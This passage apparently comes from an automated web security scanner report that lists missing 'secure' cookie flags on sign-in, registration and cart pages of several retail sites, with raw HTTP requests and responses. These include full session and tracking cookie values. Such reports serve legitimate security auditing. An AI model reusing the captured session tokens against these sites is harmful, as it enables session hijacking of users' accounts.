Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:41 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D14;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:41 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:41 GMT;path=/
Content-Length: 78368


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker Account Sig
...[SNIP]...

9.7. https://www.petsmart.com/coreg/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.petsmart.com
Path:   /coreg/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coreg/index.jsp?step=register HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=yYyYNQQfpxN12n6YXhzXGV2xP1vJDfygpGLyGrCyZRxwh4NLZ5r0!574538188; browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542861802%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A3%7Cr%3Ahttp%24*%24//www.petsmart.com/_1___1305541061807%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 16 May 2011 10:17:46 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: https://www.petsmart.com/checkout/index.jsp?process=home
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=5JXxNQ5K9p3LZsnG14q6zz517GQ0xcpK91crYtzNG9wMRphdmYgz!-1124203437; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 307

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.petsmart.com/checkout/
...[SNIP]...

9.8. https://www.restorationhardware.com/sitewide/includes/header/search.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.restorationhardware.com
Path:   /sitewide/includes/header/search.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sitewide/includes/header/search.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; engagement=4; fsr.a=1305511197072

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:10:21 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; Path=/
Set-Cookie: TS1c138a=f0a5fd2add35545830b6a4f9fdab0b712efa223a5124b4964dd08c35; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:10:20 GMT
Content-Length: 1134

<script type="text/javascript" charset="utf-8">
                   typeAhead('#search-input-field',5);
               </script>
           <form action="/search/results.jsp" class="hasrequired header-search" method="get"><input value
...[SNIP]...

9.9. https://ordering.ftd.com/reminder-signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /reminder-signin/

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reminder-signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/new-signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Sweet%20Shop%5C%22%2C%5C%22type%5C%22%3A%5C%22index%5C%22%2C%5C%22value%5C%22%3A%5C%22%252Fsweet-shop-ctg%252Fproduct-sweet-shop%252F%253Fmarkcode%253D528%5C%22%2C%5C%22prevName%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22prevType%5C%22%3A%5C%22home%5C%22%2C%5C%22prevValue%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=51933897653166366864628919699136; s_cc=true; last_active=1305541288018; mbcs=837A23D2-E1A6-55BC-B51D-1B2EBC885D29; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DCategory%25253Aproduct_sweet_shop%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305541789414

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

9.10. https://ordering.ftd.com/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511186703

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

9.11. https://ordering.ftd.com/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/signin/
Cache-Control: max-age=0
Origin: https://ordering.ftd.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c
Content-Length: 120

AID=myaccount_signin&website_id=528&reminder_service=&new=&email_isvalid=0&submitted=1&email=&password=&x=22&y=9&source=

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:24 GMT
Server: Apache
Set-Cookie: auto_signed_out=0; expires=Sun, 15 May 2011 10:28:25 GMT; path=/; domain=.ftd.com
Set-Cookie: create_account_from_toolbar=0; expires=Sun, 15 May 2011 10:28:25 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:25 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 114156


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

9.12. https://secure.bluenile.com/accounts/account-sign-in.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bluenile.com
Path:   /accounts/account-sign-in.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /accounts/account-sign-in.html HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; pop=sweeps~1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=C4A385CE7874D0A2B551FC74E3744D04; Path=/; Secure
Set-Cookie: bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:06:40 GMT; Path=/
Set-Cookie: SID=""; Domain=.bluenile.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; Domain=.bluenile.com; Expires=Tue, 15-May-2012 02:06:40 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 63219


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Your
...[SNIP]...

9.13. https://www.brookstone.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.brookstone.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.brookstone.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543325583%3B; s_sess=%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_cc%3Dtrue%3B%20ttc%3D1305541525579%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
ETag: W/"52413-1280871734000"
Last-Modified: Tue, 03 Aug 2010 21:42:14 GMT
Content-Type: image/x-icon
Content-Length: 52413
Date: Mon, 16 May 2011 10:36:08 GMT
Set-Cookie: TS657dfa=0b3c2fa6061f93d60514f85a08946e42e754034066e5db8e4dd0fe1860ac0ec56e0e0800; Path=/

...[SNIP]...

9.14. https://www.brookstone.com/formhandlerservlet

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.brookstone.com
Path:   /formhandlerservlet

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /formhandlerservlet?currentNodeLink=/shoppingCart.jsp&formName=updateCart_checkout HTTP/1.1
Host: www.brookstone.com
Connection: keep-alive
Referer: http://www.brookstone.com/shoppingCart.jsp.vr
Cache-Control: max-age=0
Origin: http://www.brookstone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543312191%3B; s_sess=%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_cc%3Dtrue%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Dcheckout%2525253Acart%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/shoppingCart.jsp.vr%25252523_4%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B
Content-Length: 21

quantity_1343815425=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, pre-check=0, post-check=0, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:05 GMT
Set-Cookie: TS657dfa=2eff89a1b2ef875f19c572c08f6b8043e754034066e5db8e4dd0fe1660ac0ec56e0e0800; Path=/
Content-Length: 92549


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...

9.15. https://www.restorationhardware.com/my-account/forgot-password.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/forgot-password.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my-account/forgot-password.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; engagement=4; fsr.s={"v":1,"rid":"1305509997099_983249","pv":3,"to":5,"c":"https://www.restorationhardware.com/my-account/sign-in.jsp","lc":{"d0":{"v":3,"s":false,"e":1}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; cmRS=&t1=1305511192547&t2=1305511197283&t3=1305541160118&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=my-account%20sign-in&ho=cimg-1.restorationhardware.com/cm%3F&ci=90007517&ul=https%3A//www.restorationhardware.com&rf=http%3A//www.restorationhardware.com/content/promo.jsp%3Fid%3D138040%26%26link%3DSFGalleryStore

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:24:01 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=b72ce5406b61a765c4dbe2b4990160aa2efa223a5124b4964dd0ffea; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 10:24:00 GMT
Content-Length: 17767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...

9.16. https://www.restorationhardware.com/my-account/register.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/register.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my-account/register.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/forgot-password.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; TS1c138a=27552492896cbb9145e280ea3c546c112efa223a5124b4964dd0fed4; engagement=5; fsr.s={"v":1,"rid":"1305509997099_983249","pv":4,"to":5,"c":"https://www.restorationhardware.com/my-account/forgot-password.jsp","lc":{"d0":{"v":4,"s":true,"e":2}},"cd":0,"sd":0,"f":1305541164254,"cp":{"my-account":"visited"}}; cmRS=&t1=1305541182545&t2=1305541183619&t3=1305541273137&t4=1305541164256&fti=&fn=requestPassword%3A0%3B&ac=&fd=&uer=&fu=&pi=my-account%20forgot-password&ho=cimg-1.restorationhardware.com/cm%3F&ci=90007517

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:32:23 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=c8ca4c79fc3e7bb28d932b5bb1dcf3292efa223a5124b4964dd101e1; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 10:32:23 GMT
Content-Length: 20125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
